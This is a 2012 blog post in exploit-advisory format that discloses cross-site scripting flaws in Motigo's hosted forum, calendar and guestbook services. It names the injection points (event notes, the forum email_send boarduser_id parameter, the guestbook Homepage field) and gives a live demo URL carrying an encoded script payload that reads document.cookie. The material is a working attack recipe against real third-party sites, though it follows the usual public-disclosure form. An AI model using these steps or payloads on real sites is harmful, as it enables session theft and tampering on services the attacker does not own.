sâmbătă, 28 ianuarie 2012

Motigo Forums/Calendar/Guestbook Cross Site Scripting

# Exploit Title: Motigo Forums/Calendar/Guestbook Cross Site Scripting
# Date: 28.01.2012
# Author: Sony
# Software Link: http://motigo.com/
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/01/motigo-forumscalendarguestbook-cross.html
..................................................................


Calendar:

Create our calendar, add new event --> in the Notes put our xss code and add this event.

Demo:

http://36317.calendars.motigo.com/day/show/date/2012-01-28






Forums:

Our xss in the email_send.

http://94932.forums.motigo.com/?action=email_send&boarduser_id= [our xss is here]

Demo:

http://94932.forums.motigo.com/?action=email_send&boarduser_id=%22%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E




Guestbooks:

Put our code in the Homepage and press button Submit.

Demo:

http://234402.guestbooks.motigo.com/?action=index

Publicat de Sony la 07:18
Etichete: ,

0 comentarii:

Trimiteți un comentariu

Rețineți: Numai membrii acestui blog pot posta comentarii.